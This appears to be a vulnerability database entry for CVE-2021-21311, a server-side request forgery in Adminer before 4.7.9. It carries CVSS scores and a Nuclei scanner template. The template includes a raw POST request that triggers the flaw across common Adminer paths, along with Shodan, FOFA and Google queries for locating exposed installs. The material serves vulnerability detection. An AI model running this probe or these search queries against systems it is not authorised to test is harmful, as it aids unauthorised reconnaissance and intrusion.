ProjectDiscoveryNUCLEI:CVE-2021-21311Adminer <4.7.9 - Server-Side Request Forgery
6.4 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:P/A:N
7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
6.9 Medium
AI Score
Confidence
High
0.021 Low
EPSS
Percentile
89.2%
Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
id: CVE-2021-21311
info:
name: Adminer <4.7.9 - Server-Side Request Forgery
author: Adam Crosser,pwnhxl
severity: high
description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to internal resources and potential data leakage.
remediation: Upgrade to version 4.7.9 or later.
reference:
- https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
- https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
- https://packagist.org/packages/vrana/adminer
- https://nvd.nist.gov/vuln/detail/CVE-2021-21311
- https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2021-21311
cwe-id: CWE-918
epss-score: 0.02092
epss-percentile: 0.89083
cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:*
metadata:
max-request: 6
vendor: adminer
product: adminer
shodan-query:
- title:"Login - Adminer"
- cpe:"cpe:2.3:a:adminer:adminer"
- http.title:"login - adminer"
fofa-query:
- app="Adminer" && body="4.7.8"
- title="login - adminer"
- app="adminer" && body="4.7.8"
google-query: intitle:"login - adminer"
hunter-query:
- app.name="Adminer"&&web.body="4.7.8"
- app.name="adminer"&&web.body="4.7.8"
tags: cve2021,cve,adminer,ssrf
http:
- raw:
- |
POST {{path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}
payloads:
path:
- "/index.php"
- "/adminer.php"
- "/adminer/adminer.php"
- "/adminer/index.php"
- "/_adminer.php"
- "/_adminer/index.php"
attack: batteringram
stop-at-first-match: true
redirects: true
max-redirects: 1
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>400 - Bad Request</title>"
- "<title>400 - Bad Request</title>"
condition: or
- type: status
status:
- 403
# digest: 490a0046304402203bfc7390e904463da3e9e24581c8502ef069540ea7730e15869bcb95630c8519022015b5d7c34b7610cf88d38904246e75218e539c437bb4f86f93301f51843ff291:922c64590222798bb761d5b6d8e72950Related
6.4 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:P/A:N
7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
6.9 Medium
AI Score
Confidence
High
0.021 Low
EPSS
Percentile
89.2%